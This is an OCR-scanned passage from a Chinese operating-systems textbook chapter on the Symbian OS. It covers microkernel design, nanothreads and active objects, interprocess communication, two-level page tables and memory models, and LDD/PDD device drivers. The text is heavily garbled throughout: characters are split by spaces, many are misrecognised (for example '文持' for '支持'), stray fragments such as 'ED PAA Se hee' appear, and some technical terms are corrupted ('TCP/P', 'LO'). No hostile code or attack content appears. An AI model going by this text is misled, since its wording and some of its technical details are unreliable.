这 样 做 对 于 保护 资源 有 着 几 点 好 处 。 首 先 ， 它 符合 操作 系统 的 面 
癌 对 象 以 及 微 内 核 的 设计 。 其 次 ， 这 种 结构 对 于 管理 多 任务 、 多 线程 
系统 中 所 需要 的 资源 多 重 访问 十 分 有 效 。 最 后 ， 每 个 服务 器 都 可 以 专 
注 于 它 必须 管理 的 资源 ， 并 能 方便 地 进行 升级 以 及 巷 换 为 新 的 设计 。 


12.2.5“” 较 大 型 操作 系统 的 特点 


尽管 Symbian 操作 系统 所 针对 的 目标 电脑 规模 较 小 ， 但 它 有 着 许 
多 大 型 系统 的 特点 。 你 可 以 在 Symbian 操作 系统 上 找到 大 型 操作 系统 
(如 Linux 以 及 Windows) 的 各 种 特性 ， 只 是 以 另 一 种 形式 出 现 。 
Symbian 操作 系统 与 较 大 型 的 操作 系统 有 一 些 共 同 的 特性 。 


-进程 与 线程 : Symbian 操作 系统 是 一 个 多 任务 多 线程 的 操作 系 
统 。 许 多 进程 可 以 同时 运行 ， 相 互 间 可 以 进行 通信 ， 也 可 以 在 各 进程 


内 运行 多 个 线程 。 


:常见 文件 系统 支持 : Symbian 操作 系统 利用 一 个 文件 系统 模型 来 
管理 对 系统 存储 空间 的 访问 ， 正 如 大 型 操作 系统 一 样 。 它 具有 一 个 与 
Windows 兼 容 的 默认 文件 系统 (默认 使 用 FAT-32 文 件 系 统 ) ， 通 过 使 
用 插件 式 接口 支持 其 他 文件 系统 。Symbian 操 作 系统 支持 几 种 不 同类 
型 的 文件 系统 ， 包 括 FAT-16、FAT-32、NTFS， 以 及 许多 存储 卡 格式 

(例如 JFFS) 。 


.网 络 : Symbian 操作 系统 支持 TCP/P 网 络 以 及 其 他 的 通信 接口 ， 
例如 捉 行 、 红 外 和 蓝牙 。 


内存 管理 : 尽管 Symbian 操作 系统 不 使 用 〈 也 没有 相应 的 设备 ) 
虚拟 内 存 映射 ， 但 它 通 过 按 页 管理 实现 对 内 存 访问 ， 并 支持 页 的 置 
换 ， 也 就 是 说 文 持 页 面 换 入 ， 但 不 文 持 页 面 换 出 。 


12.2.6 ”通信 与 多 媒体 


Symbian 操作 系统 以 多 种 方式 协助 通信 。 我 们 很 难 简单 地 对 其 进 
行 概述 而 不 提 及 通信 特点 。 通 信 的 模型 齐 循 面 同 对 象 、 微 内 核 以 及 客 
户 机 /服务 凑 结 构 。Symbian 操 作 系 统 的 通信 结构 是 以 模块 形式 建立 
的 ， 从 而 允许 新 的 通信 机 制 方便 地 接 入 操作 系统 。 从 用 户 技 接口 到 新 
的 协议 实现 ， 到 新 的 设备 驱动 ， 模 块 可 以 实现 任何 功能 。 由 于 这 样 的 
微 内 核实 现 ， 可 以 引入 新 的 模块 并 动态 地 加 载 到 系统 操作 中 。 


由 于 Symbian 操 作 系 统 只 针对 智能 手机 平台 ， 因 此 有 许多 独特 的 
特点 。 它 具有 一 个 可 插 拨 的 消息 结构 ， 可 以 引入 新 的 消 恩 类 型 ， 并 可 
以 通过 消 轧 服务 器 动态 加 载 的 模块 来 实现 。 消 息 系 统 被 设计 为 层次 结 
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类 型 对 象 。 一 种 形式 的 消 恩 传递 ， 例 如 手机 无 线 传递 类似 于 
CDMA) 可 以 传送 几 种 不 同类 型 的 消息 (标准 文本 消息 类 型 、SMS 类 
型 或 者 如 BIO 消息 等 的 系统 指令 ) 。 通 过 实现 新 的 对 象 并 将 其 加 载 到 
内 核 中 可 以 引入 新 的 传递 方法 。 


Symbian 操 作 系 统 的 核心 设计 有 专 | 针对 多 媒体 的 各 种 API。 多 媒 
体 设备 以 及 上 下 文 由 特殊 的 服务 器 和 用 户 自 定 义 的 结构 (人 允许 用 户 实 
现 描述 新 的 或 现存 的 上 下 文 以 及 怎样 对 上 下 文 进 行 处 理 的 模块 ) 来 处 


理 。 与 实现 消 妃 的 方法 相 类 似 ， 多 媒体 是 由 多 种 形式 相互 作用 的 对 象 
来 实现 。 声 音 播 放 的 方式 被 设计 为 一 个 与 各 种 声音 格式 的 实现 方式 相 
互 作用 的 对 象 。 


12.3 ”Symbian 探 作 系统 中 的 进程 和 线程 


Symbian 操作 系统 是 一 个 多 任务 操作 系统 ， 像 其 他 操作 系统 那 
样 ， 使 用 了 进程 和 线程 的 概念 。 然 而 ，Symbian 操 作 系统 的 内 核 结构 
以 及 它 对 资源 稀缺 性 的 处 理 方 式 影响 了 它 看 待 这些 多 任务 对 象 的 方 
at 
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对 于 多 任务 ，Symbian 操 作 系 统 更 倾向 于 线程 ， 并 且 是 建立 在 线 
程 概念 上 的 ， 而 不 是 把 进程 作为 多 任务 的 基础 。 线 程 构成 了 多 任务 的 
中 心 单元 。 操 作 系 统 简单 地 把 一 个 进程 看 成 是 具有 一 个 进程 控制 块 和 
某 个 内 存 空间 的 线程 的 集合 。 


Symbian 操作 系统 对 于 线程 的 文 持 是 基于 纳 线程 的 纳 核 。 纳 核 仅 
提供 简单 的 线程 文 持 ， 每 个 线程 是 由 一 个 基于 纳 核 的 纳 线程 来 文 持 
的 。 纳 核 为 纳 线程 提供 调度 、 同 步 (线程 间 通 信 ) 以 及 计时 服务 。 纳 
线程 运行 在 特权 模式 下 ， 需 要 一 个 栈 来 存储 它们 的 运行 时 刻 环境 数 
据 。 纳 线程 不 能 运行 在 用 户 态 。 这 束 意 味 着 操作 系统 能 够 对 每 个 纳 线 
程 保持 紧密 的 控制 。 每 个 纳 线程 需要 一 个 数据 的 极 小 集 来 运行 :实质 
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每 个 线程 使 用 的 代码 ， 以 及 在 运行 时 刻 的 栈 上 存储 线程 的 上 下 文 。 


同 进 程 具有 状态 一 样 ， 纳 线程 也 具有 线程 状态 。Symbian 操 作 系 
统 的 纳 核 使 用 的 模型 在 基本 模型 中 增加 了 一 些 状态 。 除 了 基本 状态 以 


外 ， 纳 线程 还 可 以 处 于 如 下 状态 : 
- 挂 起 。 这 束 是 当 一 个 线程 挂 起 另 一 个 线程 时 的 状态 ， 与 等 竺 状态 
状态 下 一 个 线程 是 被 某 个 上 层 对 象 阻塞 〈 例 如 ， 一 个 
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Symbian 操 作 系 统 线程 ) 
决 速 信号 量 
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处 于 这 个 状态 的 线程 正在 
通知 。 快 速 信号 量 是 纳 核 级 别 的 信和 号 


.DFC 等 待 。 处 于 这 种 状态 的 线程 正在 等 待 一 个 延迟 的 轴 数 调用 或 
者 要 被 加 入 到 DFC 队 列 中 的 DFC。DFC 用 在 设备 驱动 实现 中 。 它 们 代 


表 对 于 内 核 的 调用 ， 可 被 Symbian 操作 系统 内 核 层 排 入 队列 并 且 调 度 


执行 。 
休眠 。 休 了 眠 线程 正在 等 候 特定 长 度 的 时 间 过 去 。 


是 当 开 发 人 员 为 纳 线程 实现 额外 的 状 


其他。 还 有 一 种 通用 状态 ， 
态 时 使 用 的 。 当 开发 人 员 为 新 的 手机 平台 ( 称 作 个 性 层 ) 扩展 纳 核 功 


能 时 使 用 该 状态 。 进 行 这 个 工作 的 开发 人 员 也 必须 实现 这 些 状态 与 他 
们 的 扩展 实现 之 间 的 来 回 跳 转 。 


下 面 将 纳 线程 思想 与 传统 进程 思想 作 比 较 。 纳 线程 实际 上 有 是 一 个 
完全 轻 量 级 的 进程 。 它 具有 极 小 的 上 下 文 ， 当 纳 线程 进出 处 理 需 时 进 
行 切 换 。 每 个 纳 线程 和 进程 一 样 具 有 一 个 状态 。 对 于 纳 线程 来 说 ， 关 
键 是 纳 核对 它们 的 紧密 控制 ， 以 及 构成 每 个 纳 线程 上 下 文 的 极 小 数据 


集合 。 


Symbian 操作 系统 线程 依赖 于 纳 线程 ， 内 核 增 加 除 纳 核 提 供 的 功 
能 之 外 的 文 持 。 标 准 程序 使 用 的 用 户 模式 线程 由 Symbian 操作 系统 线 
程 执行 。 每 个 Symbian 操 作 系 统 线程 包含 一 个 纳 线程 并 且 添 加 目 己 的 
运行 时 刻 栈 到 纳 线 程 使 用 的 栈 中 。Symbian 操 作 系 统 线程 可 以 通过 系 
统 调用 在 内 核 模式 下 进行 操作 。Symbian 操 作 系 统 也 能 为 执行 增加 例 
外 处 理 以 及 退出 信号 。 


Symbian 操作 系统 线程 在 纳 线程 实现 之 上 实现 目 己 的 状态 集 。 由 
于 Symbian 操作 系统 线程 将 一 些 功能 性 增加 到 纳 线程 实现 中 ， 因 此 新 
的 状态 反映 了 构成 Symbian 操作 系统 线程 的 新 的 思想 。Symbian 操 作 系 
统 添加 了 Symbian 操 作 系统 线程 可 以 进入 的 新 的 七 种 状态 ， 来 关注 
Symbian 操作 系统 线程 可 能 出 现 的 特殊 阻塞 条 件 。 这 些 特殊 状态 包括 
在 信号 量 上 的 等 待 和 挂 起 (正常 的 ，、 互 不 变量 以 及 条 件 变量 。 由 于 
Symbian 操作 系统 的 实现 处 于 纳 线程 之 上 ， 因 此 这 些 状 态 从 某 种 方面 


上 来 说 是 由 纳 线 程 状态 实现 的 ， 通 党 都 是 用 不 同 的 方式 使 用 挂 起 的 纳 
线程 状态 。 


1232 are 


Symbian 操作 系统 的 进程 ， 束 是 在 一 个 单一 的 进程 控制 块 结构 
下 ， 具 有 一 个 单一 存储 空间 的 ， 归 于 一 类 的 Symbian 操作 系统 的 线程 
组 。 可 能 只 有 一 个 执行 的 线程 ， 或 者 一 个 进程 控制 块 下 有 很 多 线程 。 
Symbian 操 作 系 统 线程 和 纳 线 程 已 经 定义 了 进程 状态 和 进程 调度 的 概 
念 。 因 此 ， 调 度 一 个 进程 实际 上 是 通过 调度 一 个 线程 以 及 初始 化 数据 
需要 使 用 的 正确 的 进程 控制 块 来 完成 的 。 


Symbian 操作 系统 线程 通过 几 种 方式 ， 在 一 个 单一 进程 的 组 织 下 
工作 在 一 起 。 首先 ， 有 一 个 主线 程 被 标志 为 进程 的 起 始点 。 其 次 ， 线 
程 共 至 调度 参数 。 也 就 古 说 ， 进 程 通 过 一 种 调度 方法 一 一 改变 进程 参 
数 ， 来 改变 所 有 线程 的 参数 。 第 三 ， 线 程 共享 包括 设备 和 其 他 对 象 描 
述 符 的 存储 空间 对 象 。 最 后 ， 当 一 个 进程 终止 时 ， 内 核 终止 该 进程 的 
所 有 线程 。 


12.3.3 ”活动 对 象 


活动 对 象征 线程 的 竺 有 形式 ， 用 这 种 方式 实现 以 便 减 轻 它们 市 给 
操作 环境 的 负担 。Symbian 操 作 系 统 的 设计 者 意识 到 ， 应 用 中 的 线程 
在 很 多 情况 下 可 能 会 发 生 阻 蹇 。 由 于 Symbian 操作 系统 致力 于 通信 工 
具 方 面 ， 因 此 许多 应 用 程序 具有 类 似 的 执行 模式 : 它们 向 一 个 通信 僚 
接 字 写 数据 或 者 通过 管道 发 送信 息 ， 然 后 在 等 待 接收 者 的 啊 应 时 阻 
窟 。 这 样 设计 活动 对 象 ， 是 为 了 当 它 们 从 这 种 阻 窗 状态 返回 时 ， 具 有 
进入 被 调用 代码 的 单一 入 口 点 ,这 简化 了 它们 的 实现 。 由 于 活动 对 象 运 
行 在 用 户 空 间 ， 因 此 它们 具有 Symbian 操作 系统 线程 的 特性 。 它 们 本 
吴 具 有 目 己 的 纳 线程 ， 并 且 能 够 加 入 Symbian 操作 系统 的 其 他 线程 构 
成 操作 系统 的 一 个 进程 。 


假 大 活动 对 象 仅仅 是 Symbian 操作 系统 线程 ， 有 人 残 会 问 操 作 系 
统 从 这 种 简化 的 线程 模型 中 得 到 了 什么 益处 。 活 动 对 象 的 关键 点 体现 
在 调度 上 。 上 所 有 的 活动 对 象 在 等 行事 件 的 时 候 驻 留 在 一 个 单一 进程 
中 ， 对 系统 而 言 可 以 作为 一 个 单一 的 线程 。 内 核 不 必 连 续 地 检查 每 一 
个 活动 对 象 是 否 被 解除 阻塞。 因此 ， 单 一 进程 中 的 活动 对 象 ， 能 够 由 
在 一 个 单一 线程 中 执行 的 单一 调度 器 来 协调 。 通 过 将 在 其 他 方面 作为 
多 线程 执行 的 代码 结合 到 一 个 线程 中 ， 通 过 构建 固定 的 入 口 点 进入 代 


码 ， 以 及 通过 使 用 一 个 单一 调度 器 来 协调 它们 的 执行 ， 活 动 对 象 构成 
了 标准 线程 的 一 种 高 效 、 轻 量 版 本 。 


认识 到 活动 对 象 和 Symbian 操作 系统 进程 结构 在 何 处 融合 成 为 一 
体 生 很 重要 的 。 当 一 个 传统 线程 通过 系统 调用 进入 等 生 状 仿 从 而 阻 赛 
目 己 的 运行 时 ， 操 作 系统 仍然 需要 检查 这 个 线程 。 在 上 下 文 切换 期 
间 ， 操 作 系 统 需要 人 花费 时 间 检 查处 于 等 待 状态 的 阻塞 进程 ， 决 定 旦 否 
需要 将 其 移动 到 束 绪 状态 。 活 动 对 象 把 目 己 放 入 等 竺 状态 以 等 行 特定 
的 事件 ， 因 此 ， 操 作 系统 不 需要 去 检查 它们 ， 而 只 是 在 特定 的 事件 发 
生 后 移动 它们 。 结 采 融 是 更 少 的 线程 检测 以 及 更 好 的 性 能 。 


12.3.4 ”进程 间 通 信 


在 类 似 Symbian 操 作 系 统 的 多 线程 环境 中 ， 进 程 间 通信 对 系统 性 
能 是 至 关 重 要 的 。 线 程 ， 特 别 征 系统 服务 形式 的 线程 经 常 通信 。 


套 接 字 是 Symbian 操作 系统 使 用 的 基本 通信 模型 。 它 是 两 个 端点 
之 间 抽 象 的 通信 管道 。 这 一 抽象 是 用 来 隐藏 应 点 之 间 的 传输 方法 和 数 
据 管 理 。Symbian 操 作 系统 使 用 套 接 字 的 概念 在 客户 山 和 服务 硕 端 之 
间 、 线 程 到 设备 之 间 以 及 线程 之 间 进 行 通信 。 


套 接 字模 型 也 构成 了 设备 LO 的 基础 。 抽 和 象 再 次 成 为 使 这 一 模型 更 
加 有 效 的 关键 。 同 一 个 设备 进行 数据 交换 的 所 有 机 制 不 是 由 应 用 程序 
管理 的 ， 而 十 由 操作 系统 管理 的 。 例 如 ， 网 络 环境 中 工作 于 TCP/IP 上 
的 套 接 字 可 以 很 容易 地 通过 改变 套 接 字 使 用 的 类 型 参数 而 适应 于 监 
环境 。 这 种 变换 下 ， 其 他 大 部 分 的 数据 交换 工作 都 征 由 操作 系统 完成 
的 。 


Symbian 操作 系统 实现 了 通用 操作 系统 上 使 用 的 标准 同步 原 语 。 
操作 系统 中 广泛 地 使 用 了 信和 号 量 和 互 斥 量 的 一 些 形 式 。 这 些 为 进程 和 
线程 提供 同步 能 力 。 


124 内 存 管理 


诸如 Linux 和 Windows 系 统 中 的 内 存 管理 使 用 了 很 多 我 们 前 面 讲 过 
的 关于 实现 内 存 资源 管理 的 概念 。 例 如 ， 从 物理 内 存 框架 构建 的 虚拟 
内 存 页 面 、 按 需 分 页 的 虚拟 内 存 以 及 动态 页 面 置换 ， 这 些 概 念 共同 给 
出 近 卑 无 限 的 内 存 资 源 形 象 。 这 里 物理 内 存 是 由 诸如 硬盘 空间 等 文 持 
和 扩展 的 。 


Symbian 操作 系统 和 实际 的 通用 操作 系统 一 样 ， 也 必须 提供 内 存 
管理 模式 。 然 而， 由 于 智能 手机 上 的 存储 容量 非常 有 限 ， 内 存 模型 受 
到 限制 ， 而 且 进行 内 存 管 理 的 时 候 不 能 使 用 虚拟 内 存 /交换 空间 模型 。 
但 正 是 如 此 ，Symbian 操 作 系统 使 用 了 我 们 讨论 过 的 内 存 管理 的 大 多 
数 机 制 ， 包 括 硬件 MMU 。 


12.4.1 没有 虚拟 内 存 的 系统 


许多 计算 机 系统 没有 提供 成 熟 的 支持 按 需 分 页 的 虚拟 内 存 的 设 
备 。 在 这 些 平台 上 操作 系统 可 以 获得 的 惟一 的 存储 设备 束 是 内 存 ， 它 
们 没有 和 硬 弄 设备 。 正 因为 这 样 ， 大 多 数 较 小 的 系统 ， 从 PDA 到 智能 手 
机 ， 再 到 更 高 层次 的 掌上 设备 ， 都 不 文 持 按 需 分 页 的 虚拟 内 存 。 


下 面 考虑 大 多 数 小 的 平台 设备 上 使 用 的 内 存 空 间 。 这 些 系统 一 般 
都 有 两 种 类 型 的 存储 介质 : RAM 和 闪存 。RAM 存 储 操作 系统 代码 
( 当 系 统 局 动 时 使 用 ) ， 内 存 用 作 操 作 内 存 和 永久 性 OF) 存储 介 
质 。 通 常 ， 可 以 为 一 个 设备 (比如 安全 数据 卡 ) 增添 额外 的 内 存 ， 这 
些 存 储 空 间 专 门 用 作 水 久 性 存储 。 


没有 文 持 按 需 分 页 的 虚拟 内 存 不 代表 缺少 内 存 管 理 。 实 际 上 ， 大 
多 数 较 小 的 平台 构建 在 包含 许多 较 大 型 系统 的 管理 特征 的 硬件 上 。 这 
些 管理 特征 包含 诸如 分 页 、 地 址 翻译 以 及 虚拟 /物理 地 址 抽象 。 没 有 虚 
拟 内 存 仅仅 意味 着 页 面 不 能 从 内 存 交 换 出 去 并 存储 在 外 部 设备 上 ， 而 
内 存 页 的 抽象 仍然 在 使 用 。 页 面 被 蔡 换 了 ， 但 是 它们 也 只 是 被 丢弃 
T° 也 就是 说 只 有 代码 页 可 以 被 置换 ， 因 为 只 有 它们 备份 在 内 存 上 。 


内 存 管 理 包 仿 如 下 的 任务 : 


应 用 程序 大 小 的 管理 ， 应 用 程序 的 大 小 (所 有 的 代码 和 数据 ) 对 
如 何 使 用 内 存 有 很 大 的 影响 。 创 建 小 的 软件 需要 技巧 和 规则 。 使 用 面 
向 对 象 的 设计 在 这 里 成 为 一 种 阻碍 (更 多 的 对 象 意味 着 更 多 的 动态 内 
存 分 配 ， 而 这 需要 更 大 的 堆 尺 寸 ) 。 大 多 数 针 对 较 小 平台 的 操作 系统 
非常 不 辟 励 任何 模块 的 静态 链接 。 


- 堆 的 管理 : HE (用 来 进行 动态 内 存 分 配 的 空间 ) 在 较 小 的 平台 上 
必须 严格 地 管理 。 堆 空间 在 较 小 的 平台 上 一 般 划 定 边 界 ， 以 便 程 序 员 


尽 可 能 地 回收 重用。 冒险 越界 会 导致 内 存 分 配 的 错误 。 


: 束 地 执行 :没有 磁盘 设备 的 平台 通 第 文 持 束 地 执行 。 这 就 古 说 内 
存 被 映射 到 虚拟 内 存 地 址 空间 ， 程 序 可 以 直接 从 内 存 上 执行 ， 而 不 需 
要 首先 复制 到 RAM 上 。 这 样 做 使 加 载 时 间 减 小 为 零 ， 允 许 应 用 程序 迅 
速 局 动 ， 而 且 也 不 需要 使 用 稀缺 的 RAM 。 


加载 动态 链接 库 : 什么 时 候 加 载 动态 链接 库 的 选择 会 明显 影响 系 
统 性 能 。 例 如 ， 当 应 用 程序 第 一 次 加 载 到 内 存 束 加 载 所 有 的 动态 链接 
库 ， 比 在 执行 中 不 定时 发 生 的 加 载 更 加 容易 接受 。 比 起 执行 时 应 用 程 
序 发 生 延 迟 ， 用 户 更 加 能 够 接受 司 动 它 时 有 一 些 请 后 。 注 意 动 态 链 接 
库 可 能 并 不 需要 加 载 ， 如 果 它 们 已 经 在 内 存 中 或 者 它们 包含 在 外 部 内 
FP 〈 在 这 种 情况 下 ， 它 们 可 以 就 地 执行 ) 就 是 这 种 情况 。 


“ED PAA Se hee: 如 果 有 MMU， 尽 可 能 地 使 用 它 。 实 际 
上 ， 将 越 多 的 功能 放 入 MMU ， 系 统 的 性 能 越 好 。 


即使 使 用 殉 地 执行 的 规则 ， 较 小 的 平台 仍然 需要 保留 一 部 分 内 存 
用 作 操 作 系 统 操作 。 这 些 内 存 与 永久 性 存储 介质 共 剖 ， 并 且 通 币 以 两 
种 方法 中 的 一 种 进行 管理 。 首 先 ， 一 些 操作 系统 采用 一 种 十 分 简单 的 
方法 ， 内 存根 本 不 分 页 。 在 这 些 类 型 的 系统 中 ， 上 下 文 切 换 意 味 着 分 
配 操作 空间 (比如 堆 空 间 ) ， 同 时 在 所 有 进程 间 共享 这 些 操 作 空间 。 
这 种 方法 在 进程 的 存储 区 域 几乎 没有 保护 ， 信 任 进 程 间 可 以 很 好 地 工 


作 。Palm 操 作 系 统 使 用 这 种 简单 的 方式 进行 内 存 管 理 。 第 二 种 方法 是 
使 用 一 种 更 加 有 规则 的 方法 ， 内 存 被 切 分 成 为 页 ， 这 些 页 按照 操作 需 
要 分 配 。 操 作 系 统管 理 一 个 空 几 列表 来 体 存 页 ， 按 照 需 要 分 配给 操作 
系统 和 用 户 进程 。 在 这 种 方法 中 〈 由 于 没有 虚拟 内 存 ) ， 当 页 的 空闲 
列表 用 光 时 ， 系 统 瑟 会 没有 内 存 ， 从 而 不 会 再 有 分 配 发 生 。Symbian 
操作 系统 是 第 二 种 方法 的 例子 。 


12.4.2 ”Symbian 操作 系统 的 寻 址 方式 


由 于 Symbian 操作 系统 是 32 位 系统 ， 因 此 寻 址 范围 可 以 达到 4GB 。 
它 与 更 大 的 系统 一 样 使 用 同样 的 抽象 方式 : 程序 必须 使 用 由 操作 系统 
映射 到 物理 地 址 的 虚拟 地 址 。 和 大 多 数 系统 一 样 ，Symbian 操 作 系 统 把 
内 存 划 分 为 虚拟 页 面 和 物理 页 框 。 页 框 的 大 小 通常 是 4KB， 但 也 是 可 


变 的 。 


因为 最 大 具有 4GB 的 地 址 空间 ， 因 此 4KB 的 页 框 大 小 就 意味 着 具有 
超过 100 万 条 目的 页 表 。Symbian 操 作 系统 只 有 有 限 的 内 存 ， 因 此 不 能 
拿 出 1MB 内 存 专用 于 页 表 。 而 且 ， 对 这 么 大 的 一 张 表 的 搜索 和 访问 对 
系统 部 是 很 大 的 负担 。 为 了 解决 这 个 问题 ，Symbian 操 作 系 统 采 用 2 级 
页 表 方 式 ， 如 图 12-2 所 示 。 称 作 页 面目 的 第 一 级 提供 一 个 到 第 二 级 的 
链接 ， 可 以 使 用 虚拟 地 址 的 一 部 分 进行 检索 《前 12 位 ) 。 该 目录 驻 贸 
在 内 存 中 ， 由 TTBR (转换 表 基 址 寄存 器 指向 。 每 个 目 孙 条 目 指向 第 
二 级 ， 也 吏 是 页 表 的 集合 。 这 些 页 圾 提供 到 有 菏 一 内 存 中 符 定 页 的 链 
接 ， 由 虚拟 地 址 的 一 部 分 检索 “中 间 8 位 ) 。 最 后 ， 虚 拟 地 址 的 低 12 位 
索引 检索 页 的 字 。 在 这 一 虚拟 -物理 地 址 映射 计算 中 ， 硬 件 起 辅助 作 
用 。 尽 管 Symbian 操 作 系统 不 能 假定 任何 辅助 硬件 的 存在 ， 但 是 在 大 多 
数 体系 中 这 一 映射 转换 都 是 由 MMU 完 成 的 。 比 如 ARM 人 处 理 器 就 具有 扩 
展 的 MMU， 融 有 转换 后 备 缓冲 胡来 辅助 地 址 计算 。 


虚拟 地 址 
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图 12-2 Symbian 操作 系统 使 用 2 级 页 表 来 减少 页 表 访 问 时 间 和 占用 


空间 


当 一 个 页 面 不 在 内 存 中 时 ， 束 会 出 现 错误 状态 ， 这 是 因为 当 一 个 
应 用 程序 启动 的 时 候 所 有 的 应 用 程序 内 存 页 面 都 应 该 已 经 被 加 载 ( 没 
有 请 求 页 面 调度 ) 。 链 接 到 可 执行 应 用 中 的 小 的 桩 代码 显 式 地 把 动态 
加 载 库 加 载 到 内 存 中 ， 而 不 是 通过 页 失效 方式 。 


Symbian 操作 系统 中 尽管 没有 页 交换 ， 但 内 存 却 不 可 思议 地 走动 态 
的 。 应 用 程序 通过 内 存 进 行 上 下 文 切 换 ， 同 时 正如 上 面 所 说 的 ， 当 应 
用 程序 开始 执行 时 将 它们 所 需要 的 存储 空间 加 载 到 内 存 中。 每 个 应 用 
程序 需要 的 内 存 页 面 能 够 从 操作 系统 中 静态 请 求 进入 内 存 。 对 于 堆 
(更 确切 地 说 是 动态 空间 ) 是 有 界限 的 ， 因 此 静态 请 求 也 可 以 由 动态 
空间 来 实现 。 从 一 个 空 内 页 框 的 列表 中 分 配 页 框 给 页 面 ， 如 琳 没 有 空 
内 页 框 ， 那 么 就 会 出 现 错误 。 正 在 使 用 的 页 框 不 能 被 刚 到 的 应 用 程序 
的 页 面 奉 换 ， 即 使 该 页 框 是 针对 当前 没有 执行 的 应 用 程序 的 。 这 是 由 
于 Symbian 操作 系统 中 没有 页 交换 ， 同 时 因为 十 分 有 限 的 内 存 空 间 只 给 
用 户 文 件 使 用 ， 也 就 没有 空间 来 复制 被 收回 空间 的 页 面 。 


实际 上 Symbian 操 作 系 统 使 用 的 存储 实现 模型 有 四 种 不 同 的 版 本 。 
每 种 模型 都 是 为 了 特定 类 型 的 硬件 配置 。 一 个 简要 的 列表 如 下 : 


-移动 模型 ， 该 模型 是 为 早期 的 ARM 体 系 结构 设计 的 。 移 动 模型 中 
的 页 目录 是 4KB 长 ， 每 个 条 目 4 子 广 ， 给 出 一 块 16KB 大 小 的 目录 。 通 过 
与 页 框 相关 的 存 取 位 和 使 用 域 来 标志 存储 如 访 问 的 方式 人 护 存储 页 
面 。 域 信息 记录 在 页 表 目 隶 ，MMU 为 每 个 域 实现 访问 权限 。 尺 管 没 有 
明确 使 用 分 段 ， 但 是 在 内 存 布局 上 有 如 下 结构 :有 用 户 分 配 数 据 的 数 
据 区 ， 也 有 内 核 分 配 数 据 的 内 核 区 。 


复合 模型 : 该 模型 是 为 ARM6 或 着 之 后 的 体系 开发 的 模式 。 这 些 
版 本 中 的 MMU 与 以 前 版 本 使 用 的 不 同 。 例 如 ， 由 于 页 表 目 隶 能 分 成 两 


部 分 ， 每 个 部 分 索引 页 表 的 不 同 部 分 ， 因 此 需要 不 同 的 处 理 方式 。 这 
两 部 分 分 别 用 作用 户 页 表 和 内 核 页 表 。ARM 体 系 中 新 的 版 本 修订 并 增 
每 个 页 框 的 访问 位 ， 但 是 不 赞成 使 用 域 的 概念 。 


-直接 模型 :该 模型 假定 根本 束 没 有 MMU。 这 一 模型 很 少 使 用 ， 并 
且 在 智能 手机 上 禁止 使 用 。 没 有 MMU 会 导致 严重 的 性 能 问题 。 由 于 某 
些 原因 ，MMU 补 禁止 的 一 些 场合 中 该 模式 比较 有 用 。 


.仿真 模型 : 该 模型 是 为 了 文 持 基于 windows 宿 主机 的 Symbian 操作 
系统 仿 。 仿真 器 与 实际 的 目标 CPU 几乎 没有 区 别 。 仿 真 器 作为 一 
个 单独 的 Windows 进 程 运行 ， 因 此 地 址 空间 被 限定 为 2GB， 而 不 是 
4GB。 为 仿真 磺 提 供 的 所 有 内 存 可 以 被 任何 Symbian 操作 系统 进程 访 
问 ， 因 此 不 具有 内 存 保护 。Symbian 操 作 系 统 库 以 Windows 格 式 的 动态 
链接 库 形 式 提供 ， 因 此 Windows 处 理 内 存 的 分 配 和 管理 。 


12.5 输入 和 输出 


Symbian 操作 系统 的 输入 /和 输出 结构 仿照 其 他 操作 系统 的 设计 。 本 
会 指出 其 中 一 些 Symbian 操作 系统 特有 的 基于 目 己 目标 平台 的 性 


nel 
质 。 


12.5.1 设备 驱动 


在 Symbian 操 作 系 统 中 ， 设 备 驱 动作 为 具有 内 核 权限 的 代码 运 
行 ， 从 而 赋予 用 户 级 别 的 代码 对 系统 保护 资源 的 访问 能 力 。 同 Linux 与 
Windows 一 样 ， 设 备 驱动 程序 代表 软件 去 访问 硬件 。 


Symbian 操 作 系 统 中 的 设备 驱动 分 为 两 层 ， 一 个 是 逻辑 设备 驱动 
(LDD) ， 一 个 是 物理 设备 驱动 (PDD) 。LDD 为 上 层 软件 提供 一 个 
接口 ， 而 PDD 直 接 与 硬件 进行 交互 。 在 这 种 模型 下 ，LDD 可 以 为 一 类 
特定 的 设备 使 用 相同 的 实现 ， 而 PDD 随 着 不 同 的 设备 改变 。Symbian 
操作 系统 文 持 许多 标准 的 LDD。 有 时 ， 如 果 硬 件 非常 标准 或 者 常用 ， 
Symbian 操作 系统 也 提供 PDD 。 


考虑 串 行 设备 的 一 个 例子 。Symbian 操 作 系 统 定义 了 一 个 通用 的 
串 行 LDD， 该 LDD 定 义 了 访问 串 行 设备 的 程序 接口 。LDD 给 PDD 提 供 
一 个 接口 ，PDD 提 供 串 行 设 备 访问 接口 。PDD 实 现 有 助 于 调节 CPU 和 


串 行 设备 之 间 速 度 差异 所 必需 的 缓冲 和 流 控制 机 制 。 一 个 单一 的 LDD 
(用 户 那 边 ， 可 以 连接 任何 用 来 运行 串 行 设备 的 PDD。 在 某 个 特定 的 
智能 手机 上 ， 这 些 PDD 可 能 包括 一 个 红外 端口 或 者 一 个 RS-232 端 口 。 
这 两 个 是 非常 好 的 例子 ， 它 们 使 用 相同 的 串 行 LDD， 但 是 使 用 不 同 的 
PDD ° 


当 LDD 和 PDD 不 在 内 存 中 时 ， 它 们 可 以 由 用 户 程序 动态 地 加 载 进 
内 存 。 程 序 编制 工具 能 够 检查 是 否 需 要 加 载 。 


12.5.2 ”内 核 扩 展 


内 核 扩 展 束 是 Symbian 操 作 系 统 在 引导 时 刻 加 载 的 张 动 程序 。 由 
于 它们 是 在 引导 时 刻 加 载 的 ， 因 此 是 与 标准 的 设备 驱动 区 别 对 待 的 特 
殊 情况 。 


内 核 扩展 与 标准 的 设备 张 动 不 同 。 大 多 数 设备 驱动 是 由 LDD 同 成 
对 的 PDD 实 现 的 ， 在 用 户 空 间 程序 需要 的 时 候 加 载 。 内 核 扩展 在 引导 
时 刻 加 载 ， 针 对 符 定 的 设备 ， 通 向 没 有 成 对 的 PDD 。 


内 核 扩 展 是 引 寻 过 程 的 一 部 分 。 这 些 特 殊 的 设备 驱动 在 调度 郁 局 
动 之 后 加 载 并 且 局 动 。 它 们 执行 对 于 操作 系统 非常 重要 的 功能 : DMA 
服务 、 显 示 管 理 、 对 外 设 的 总 线 控制 〈 例 如 USB 总 线 ) 。 之 所 以 提供 
它们 有 两 个 原因 。 首 先 ， 它 与 我 们 已 经 看 作 是 微 内 核 设计 特征 的 面向 
对 象 设计 抽象 相称 。 其 次 ， 它 允许 Symbian 操作 系统 所 处 的 不 同 平台 
运行 专 | 的 设备 驱动 ， 从 而 不 需要 重新 编译 内 核 而 使 用 硬件 。 


